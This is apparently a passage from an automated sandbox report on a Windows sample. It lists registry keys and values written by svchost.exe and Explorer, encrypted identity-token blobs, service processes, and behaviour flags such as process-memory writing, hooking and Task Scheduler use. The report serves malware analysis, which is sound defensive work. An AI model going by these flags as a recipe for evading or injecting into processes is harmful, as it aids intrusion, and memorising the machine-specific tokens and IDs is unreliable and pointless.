| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400F8614EC51" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02nvpqbanfiebhkd" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceId = "0018400F8618AD21" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000005917119a08944e46af382a28bf2ce74300000000020000000000106600000001000020000000c73c02246791d073536f93a46ceb85dc797be59dfd5fc5c7adfac9004a1152dd000000000e80000000020000200000004e09269f78716faf4002a128f779cc3538992ad7fdaa116680bd22232f261523100d00007e25df08db53b565d67fbb6613102b4d63b364db5e68c4634f525ca938e25479a256b70734b4b065fa390c9f7390f4da834f47e39c01af6145282bc84b5c3b1f8eddfe721f78264e1e35111bd3cdca16d2b4b17e23995d285aa626e6a772ae37dae091bdd7d3c63ec73fc7edbe07a33fd33cb09113d8200893208a8f7c39d0771880d404249a16420e56c5c208d211c283144a494f733969ad9b7090c8cb316d0749069512f0b1063964fd4e0ed25356f4a7682ad3949da8881b082473278e3e7a83cceba278af053029033c33c1d832424f76baf694ad14b875e9cd9159c1daea9f96ee1c64b9f87456fd18c478ec97438d41a057e1929d1fec7bc03ecf1e82ace9e4fb44e7660d8a1b9b2e967805cfa1947b46da927a2705d7c8e1de2a0e25ac39c101ecf342a2b9f2e419c0552aa8f62d5c85f2e387939c71d3b509ec6522068f223915268152fb50fc58b279f13cdc96bd0b457848cdf4ef624504e0275a7ce5ea143cba88df4abbd38c0d2ce7d6db97063edaf92a61f5a82ba2f4ceb6dab93c737ae99cf1929132ff6c27a1c1c390be78d16d193723be48b494e9555f7a4c67b795d921e6e4a57b234bbad70dd1467e77212427ec03537ceba19a7403b6e6b1a35d9af07b7a37c80d1fef1e1ea968692d7ed685f4e871691b21c01546bf81cc93e09a3545e33055e93639ba67ecf5163a919ca736a6499e459cc5767428b6730a9df2985f6b1d2bffbf426c1a25ecb5f32ba4a8ac029ccc527da78e7b8e7c70383feffb272c72f7fc0b5addbd0cd55d2d27202f48ad19e3c25404097d86c0074ef2e785c75f5d72a2c8e1f528df970655121c3fb3b088a92a9a16f3605a0418d598c9b3e3d8ce49e3fe80862139ba91dd1c68c7c9401eb6c2dc1a7be47589744d73df2764209eada9a764b2f97d727f463068dd0f7a06008b919b244624607174787c394aa73cd32fdabc91229271e5ee5770b79b9336d1beb6f3987040d578649c7ced1755a1aad5b0efed0988f7862bffde779f19393df467111758aefbb73a26c07dd65d586d5fe14869b34a537a96cc3e12544cab497c3a8617789af60bd33b54a5ea13c0feb5ee307af208ce34248b86893309b151e0ec7c2675d8cf027430aacfeac10511e65c3bb5fa67d219fa5babd11fc0e135c7c8742e466172efde454535c8b31f56a95b905de424fa2bf03ea94d7e97afa247e4c696fe507b4081479fea842f11d6468b612fc866db1288d20b6331480da3117eb3d5f5383b1238d58fb1ad195f96da3724de95c568099f166ef80717cae89b3b0278d331ef3d7895803ddd0799d71cf6a3e52cce84d0a27d1709c10d75c93ee72f8510ce82ffa9447dffba09a0e1441c853b22e3f687212c3285a01e23c46e2bd38594048506413049120b61006ef6da14236d7ff2d728a77cf3569b8d54a8d04241cb2823e7bc692bf86a477d5dc749be300f4a46826b3515dcfc3e24a87a06c2954104f5d16f16a3363cc7390b49dc0fc02e0116cc4edd1e842981e10ba4224099d768f9908ddc4c784a785626bb022d03a9988291bfd12341dc8e5be5e72708c53d7ba2f82e6cab2fbdefb1f99589db8c830c1081eebce56dffc50a5c566d73f15f56b864e1e492b9a61fec2319a3311ba5eacc77cf62e9a71b2ccdb62421e118fd1e0e3c10f8702cf6856c1e3e0f33d36e03e7c1efe249f1710c229225dc34e901463474a2e9c93023bffe2bca5d963695518df45bb1f1340a8772afe650b2bb655dfd7851912af7192322b8c1168bcbfcc2689182f053c72e8ffe7d76a2879e2f91149e4a7b69bb18c98797a007cb2dc5c99c8f17b04816f64c4cc5ee75e1ebd3e5eb89c11ad1aa53498c653d39cb6ee0529ffe942e86467d320176c00d4566fc2be4a0154a14ca8bcc5c4f2aedd54cbe8253bb068f5db97df7a4b98e4644e87bfd400bff0318bde4a332dd24d7112b879be94da24b19481d65dd85e416892a0bb2d10054f0161d242b18fe603e487d26a2bfea7c88f300067c9de0792f2038dcd09446972dd8825e1da8618a09ab0f636ad6b8c7ca4d1fa030856d6e6d6dce93c4e675279d84a39548e618d8cf8b28a9a5363b93cb72b4e41c3ce25016590dd521a1b7d8909fc3a4dc1cf653220a1bcc8fc906864934b62232d1f1a3b71ac5b50c0f60b1c21e5879d998af3e42f64ff3bde1414dd77ef93103d6c21f7b067abef60abc37c8ebf91807aaf85f9c05632ed776138c3606f494a6f9004621955691f4de0c30a76707ceaf2d151a678976c48c0067d21ec1ae3fc3b8e49c85ef4d702366606be9a4b07910aabf697a653b685aa6ce028cd4432b4b82055d9e3d25ecacd06e90c4a1060439c6b672e847c67c2c5febc39d112b9d9a663701f61ecb5b59d372eb42927b215ca3d65a676e3ab1b75317c16ce249c328032c5159b328e32eeffd6be5583f94ae9efef1134f1496f1126dc0cbcb652ff931509ae0543436b374c204e4b07546ac963e9d0cada9adc6c1c1ab4925fce8156b073ff4ac595d5106111c71f0cf0473dd3af3ce6d13a697818d9be8679241ec024cd6e77a6e44a73d76a102605a53f4a216559b3bb567aae17d31271e33f421a0b8e22827a24940dbc249e4d40ddec6deda727ada06a21841c80ec351bcb9494d4c3e465d2c4c0e95a1f5589c1ba96c72f63ef05707f2446ced9f867f443634c756d72d71193804f59988d20c083ea70122609baa5fb1c6a003d39831803e632129d4ed3efef69a98d0c37c23d9eb635d88007b90eea874fd7d7efdc3ea19abe23069b99cadfd98e52c2b28d2cee0d2e22946043076139f9efd9a9f31f6d0259a92d63cde5529c14800ed25a30002f30db757e15ead12bdec2c0a27be4495048e77d869f63656cfcad021db4d670313dcc329b138a93f7f41cb6fa6f20af35e8c76be9e8e5933347a02b0dfbacc76ae006626b535f2fa20655cc01b306bc5065f5cbfe144730811988c0f1c980f1f0fa386373beac5e688767dfaa5a1182cf8aa92ec5f6473f4898742a1be04e345d67cea83d235508ae34b31cbd201c3942859406f8977144bedc24a712032c069fc9a85caa545db55e74fb0446ad2029eaf51846f45e2bc23642f3d148541b3d6bbeed11c32625afc57d241974f6cac202cba0fa6c1706732e6c199a5871df09583697f5bd3527fcbf42e3f11b48de73054198d331af7079d787e717b45417e34ef834ba0af1dcfbb200e983875ebabc7ac4c02732d0559d20cd2808e284fad945a52be9222eb49c781070a99dfc7d071dc5994bcf36604bd8c7244bb41cc74a7111336c61b05a3ff577050ad75751cc30b6a3f2f3792faa9d06d4ae6869d30171fe11c2496faff25dce4e69aa8ebdbabb555c49a510c653ca14973dd0117dc4f24f64cba1509c051293a32fb27e0d10f698607a862f20ee2c620668014507912c82d1b2897e54a3dda27abd02598033cbbbacc940f06c9a3b9d41b9eca523b9db4345899f10a99d7f3a23ab2f4c32e01bc6ffc4a18b0f86bf95bd5953663ec0f5bfa09de6749e127ca4f1ed729a720376f1836766ae4ad2100935d1f7fe4a060acb8fc3c786a43fa277e6141e6076b9c90981583275de32e342357354a914eb608d34a03155ea96044c12806dca8c55b5adfeb18f420752c2cda975377448d4bbba771850be5bf221281edd0b295d014e936c47d7695a8814bbe92ddbca85c9c2c25b2980c9e926a803e8c15ee601cb4ab0fc6034b9b8476d863d4245c6a75103024565cbb9bce5c9de8bd7ca82579a7868e245e17890d7c650da9723260c1795e493e4aa96c8a00d0cdd807c3792ef3a06e7ef6b1c0a8d0ae339d6c8d4a45d8707273ae560c0eeed713f06477d94ad39ebfdf8671b995aa5ba8f4558d126dbecc68f594fd5579e857e97f1a336ac90e07e9526b86536a21305c6ead1126d5b960a556beeb92fd899a8d15fdb1a5fa1424bdc9b0d4a680e5a55392539c1bba1af86db27537d32ddadf161f0ac132ad87474977b3a41279f159408e0c0f218286e513aa856a35c7d46191e18734864096cfcb0350837382effe6c4df8b065c27ddd83794244f8a869506b8819b096229e72f274618f98a659ddf769c69e08576007f51c26f751dd52395fe581e1e61a6aa63553c24ef19031423bf49c76f4bf720c8fa7915fd9d4868438ba192cd37ff57f9425074bb6c83035f871c9e2382bf649a23c05d14a697a56505f069d8b2ca2fd6d2dd5d6b2040cc3ccd2f5771bebe0bd959b689d497a52bae429a8f0bfd9d5d9786cc831423e24d5a07ce0401ebfc21cb9aa97d709a2a1bbd84921bcba87d47dd5832b48ad8bb0b1120556eaf8b73198b83143fc14113079962e9ecf8beccf77e2d5cf606e9033d9dbbe143b5ca4796123a83594ebf6bf2171c5b767a8f676711c4bf3707dfd067ab1700c4f3a9ea364dfac71e49b6a628d6ba5a69eeb14e4e1bd473026ab38d17ced697a78c608a8d78101273560998540c285a0e7cc8b90e6f95c12750901bf69e230eb737c761f581d675132fe414f1c9a48f8c0769f8d28e42c3e8c6626e41231c070e60590621c5161ff47fe06b841f46f8e42a03d785a9bb3133f01be6655e08dc4363c9466891c4c45fffa4ba8ea81b8268e48ad3fec566c3b39c24ea9cbab014a3d38fc3240ac63cc9397b7c1a7a37a0efecfc0deace58902e6a191c205ed93a0b2841c2cfeceba442f711c34564000000054fd301ac21f90f9c95cd4b7b467d82eecd71eb51056ea57d38b45c3ee2f142171d8479e1d46422e2d8342189f9bfe32d5dad0b887241c85398d620f22aca2a4 | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nvpqbanfiebhkd\DeviceId = "<Data LastUpdatedTime=\"1717176216\"><User username=\"02NVPQBANFIEBHKD\"><HardwareInfo BoundTime=\"1717176217\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02nvpqbanfiebhkd\DeviceId = "<Data LastUpdatedTime=\"1717176216\"><User username=\"02NVPQBANFIEBHKD\"/></Data>\r\n" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nvpqbanfiebhkd\Provision Friday, May 31, 2024 17:23:35 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAWRcRmgiUTkavOCoovyznQwAAAAACAAAAAAAQZgAAAAEAACAAAAAncboLtIk2gg3n0lK5KKxeNAb33VF5U/W00dXprVQM7AAAAAAOgAAAAAIAACAAAAD34QduScfEYc73hcb4hfjcE4CqF5CEae3L49h0qNrg4SAAAABaYkvexpg0ziiaVLgIRMdaK0ISTJ0TkF9hTrmXKcOUYkAAAADoUnC2hT74ppGW6KNzFQ08D9I/ZO5tknePlSiuLbxfJAGHTOfEZEUnUHUpGv5NuaROM5Y5Ru3c62NXzhP2jF8h" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\ApplicationFlags = "1" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property\0018400F8618AD21 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000005917119a08944e46af382a28bf2ce74300000000020000000000106600000001000020000000a6e6c4d2b8ec97e44781330b130310081b84f1166baf56a67677d106e9bbd4e2000000000e8000000002000020000000ef44824c1b9b857188812dd74fcbc5c3a281a2046e0793d4e8afffcf650d1c01800000004e778af652f9bd89a8540a79df7f1c700b61bc5cecc8007d246ef6db88d0a7c96d5cc341bcf949068b73acc6f4bf680570a85c1c1287804b246e0d5aebc2da352a62eb6aea6e6b2514de8994e5d3c3ff2607f34a17ab8d1b3b1ef8846f63246d68eec8e93c0c9957772c648c5f8f9d99153530637f54a16c65ae12099a68015d400000000b26e64a9fef8db3a7f095aa854e7d20fb671c07ad9056e40489573e6c6ab93292b136d7ca39ca48bf282640c203228bba96f299397dbd6ea67b4615877b30af | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\IdentityCRL\Immersive\production\Property | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\{C9A7CFA8-68C6-0000-34F3-A7C9C668DA01}\S-1-5-18\{22D657D1-033A-46D1-B8FD-96FDC1D2E7A9} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\{C9A7CFA8-68C6-0000-4AF3-A7C9C668DA01}\S-1-5-18\{6A8A1E8B-4138-483E-B6E8-53F05A608170} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\{C9A7CFA8-68C6-0000-4CF3-A7C9C668DA01}\S-1-5-18\{2B1FBDB3-5687-4CB1-AA20-8CC5C4A51631} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133534342109453946" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\{C9A7CFA8-68C6-0001-D3F4-A7C9C668DA01}\S-1-5-18\{3727113D-EC25-4A6F-82B0-A413EC13D1D9} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\{C9A7CFA8-68C6-0000-7AF3-A7C9C668DA01}\S-1-5-18\{8B319A09-7187-43C6-BAF6-4702C11FB272} | C:\Windows\system32\svchost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
